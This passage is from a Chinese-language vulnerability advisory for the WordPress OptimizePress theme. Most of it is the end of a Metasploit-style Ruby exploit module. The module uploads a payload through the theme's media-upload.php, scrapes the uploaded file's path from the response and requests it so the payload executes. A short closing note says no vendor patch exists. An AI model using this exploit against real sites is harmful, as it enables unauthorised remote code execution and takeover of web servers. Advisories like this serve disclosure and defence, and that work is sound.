WordPress OptimizePress主题'media(2)

res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php'),
      'ctype' => 'multipart/form-data; boundary=' + post_data.bound,
      'data' => n_data,
      'headers' => {
        'Referer' => "#{uri}/wp-content/themes/OptimizePress/lib/admin/media-upload.php"
      },
      'cookie' => cookie
    })

unless res and res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Unable to upload payload")
    end

print_good("#{peer} - Payload uploaded successfully. Disclosing the payload path...")
    #get path to payload
    res = send_request_cgi({
      'method'  => 'GET',
      'uri'      => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
    })

unless res and res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
    end

payload_url = ""

if res.body =~ /name="cs_img" value="(.*#(unknown).*)" \/> <span/
      payload_url =$1
    else
      fail_with(Failure::Unknown, "#{peer} - Unable to deliver the payload")
    end

begin
      u = URI(payload_url)
    rescue ::URI::InvalidURIError
      fail_with(Failure::Unknown, "#{peer} - Unable to deliver the payload, #{payload_url} isn't an URL'")
    end

register_files_for_cleanup(File::basename(u.path))

print_good("#{peer} - Our payload is at: #{u.path}! Executing payload...")
    send_request_cgi({
      'method' => 'GET',
      'uri' => u.path
    })
  end
end

建议:
--------------------------------------------------------------------------------
厂商补丁:

optimizepress
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本。
